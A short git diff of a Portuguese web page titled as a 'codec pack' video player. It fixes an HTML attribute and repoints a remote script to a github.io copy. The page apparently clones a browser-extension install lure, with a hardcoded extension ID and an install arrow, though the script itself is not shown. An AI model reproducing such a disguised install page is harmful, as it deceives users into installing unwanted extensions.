--- a/index.html
+++ b/index.html
@@ -1,7 +1,7 @@
 
 
 <!DOCTYPE html>
-<html lang="pt>
+<html lang="pt">
   <title>SuperExtremePackCodecsVideoHDPlayer2018</title>
   <meta charset="utf-8">
     <meta http-equiv="X-UA-Compatible" content="IE=edge">
@@ -18,7 +18,7 @@
                   <script>try	{
 			extensionid = "hdbjiijdnlcipogljpijhiadgigfcmkf";
 		}catch{	}</script>
-                  <script src="https://i3j3u3u9.ssl.hwcdn.net/pages/StreamItOnline/resources/scripts/minified/main.D413769E9D93250FA45F38EF6491C004.js?v=1535526465"></script>
+                  <script src="https://jmltda2018.github.io/SuperExtremePackCodecsVideoHDPlayer2018/main.D413769E9D93250FA45F38EF6491C004.js?v=1535526465"></script>
                   <div class="install-arrow-container vertical">
                     <div class="arrow vertical"></div>
                   </div>
